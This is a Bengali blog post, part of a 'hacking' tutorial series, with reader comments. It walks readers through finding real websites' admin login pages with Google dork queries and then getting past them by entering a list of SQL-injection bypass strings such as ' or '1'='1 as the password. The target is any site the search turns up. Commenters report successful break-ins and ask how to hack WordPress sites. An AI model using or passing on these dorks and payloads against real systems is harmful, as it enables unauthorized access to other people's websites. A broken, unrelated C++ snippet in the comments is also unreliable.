আসসালামু আলাইকুম, সবাইকে আজকের পোষ্টে আবারও স্বাগতম। কেমন আছেন সবাই? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে আশা-পাশের সবাইকে নিয়ে খুবই ভাল আছেন। ভাল থাকুন ও ভাল রাখুন আপনার পাশের মানুষটিকে।
হ্যাকিং নিয়ে ধারাবাহিক পর্বগুলো দেখেনঃ
- !i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১
- i!i!i!i! কিভাবে RapidShare ক্র্যাক করবেন i!i!i!i! পর্ব- ২
- মাত্র ৫ মিনিটে একটি ওয়েবসাইট হ্যাকিং করুন (মেগা পোষ্ট) পর্ব- ৩
- আবারও হ্যাকিং করুন ওয়েব সাইট!!! এবারেরটা কতক্ষণ? ১০ মিনিটও লাগবে না | পর্ব- ৪
- XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব- ৫
- …::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬
- IIS Exploit সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল (উইন্ডোজ ৭) | পর্ব-৭
- ®¤Θ RTE হ্যাকিং টিউটোরিয়াল, হ্যাকিং করতে মাত্র কয়েকমিনিট সময় নেন ®¤Θ | পর্ব-৮
শিরোনাম দেখেই আশা করি বুঝে গেছেন পোষ্টটি কি নিয়ে ? জ্বী, ঠিকই ধরেছেন। আজ দেখাব মাত্র ৫ মিনিটে কিভাবে একটি ওয়েবসাইট বস্কাইয়া (হ্যাকিং) দিতে হয়। খুবই মজা হবে। আমার মনে হয় উৎসুক জনতা এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে। পোষ্ট তো করেই যাচ্ছি কিন্তু মন্তব্যই পাই না। দেখা যায় যে একটা পোষ্ট করার কিছুক্ষণ পর দেখা যায় ৩০০-৪০০ জন ভিজিটর পড়ে ফেলেছে। কিন্তু ঐ সময় দেখা যায় মন্তব্য এসেছে ১, ২ বা ৫টা। এই ভাবে চললে লিখতে কার ভাল লাগে। আপনাদের তো আর বলি না লিখতে পোষ্টটি পড়ে সব শিখ ফেলেছেন কিন্তু এরপর কাজটাও সেরে ফেলেছেন। কিন্তু কিন্তু একটা মন্তব্য করার মতো আর সময় পেলেন না। এই জন্যই আমরা বাঙ্গলী। যাক চলুন পোষ্টে……….। শিখে ফেলি কিভাবে ৫ মিনিটে একটা ওয়েবসাইট হ্যাকিং করতে হয়।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
- প্রথমে আমরা যাব www.google.com এ।
- এবার Search বক্সে যে কোন একটি Google dork লিখুন।
- আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
- এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
- যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
- এখানে ইউজার নেম দিনঃ “Admin”
- তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও নাই :P
- নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
- তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:'or'1'='1
- এবার submit এ ক্লিক করুন।
- ব্যস কাজ শেষ আপনি এখন রাজা যদি ছেলে হন আর মেয়ে হলে রাণী :P
আসলে ও চরম পস্ত।
আগে একটু হেসে নাই , তারপর বলি হাসতেছি কেন ,
হা হা হা হা হা হা হা
১০ বার try করেছি, হয়নি, ভাবলাম আবার কমেন্ট করি “ভাই পারতেসিনা ”
কমেন্ট এর ২ line লেখলাম , “মতামত দিলাম” ক্লিক করার আগে ভাবলাম আরেকবার try করে দেখি.
আবার হয়ে গেল.
কথা দিলাম, দুষ্টামি হয়ত করব , কিন্তু কারো ক্ষতি করব না .
অসংখ ধন্যবাদ অনির্বাচিত টিউনার ভাই.
#include
int main()
{
char a,I,M,R,A,J,HOSSAIN;
cin>>a;
I=a+19;
M=a+8;
R=a+0;
A=a+13;
J=a+10;
HOSSAIN=a+18;
cout<<I<<M<<R<<A<<J<<HOSSAIN;
return 0;
}
ভাই সত্যি মজা পাইছি ভাই। কিন্তু বিসশ্বাস করতে সময় লাগছে যে এত সহজেই আমি হ্যাকার হয়ে যাব । ধন্যবাদ ভাই। আমি আপনাকে জিমেইল এ অ্যাড দিছি ভাই। মন চাইলে অ্যাড করেন pls .
প্রিয়তে রাখলাম পরবর্তিতে ব্যবহার করার জন্য…….ধন্যবাদ. ও হা প্রিয়তে রাখা পোস্ট গুলু আবার দেখার system ki?
পাসওয়ার্ডে SQL Injection দেয়ার সময় কি Space দিব? নাকি কোন স্পেস না?
brute force এর download লিঙ্ক তা দিলে উপক্রিত হতাম @admin
এডমিন ভাই wordpress website hack করতে পারবো . ????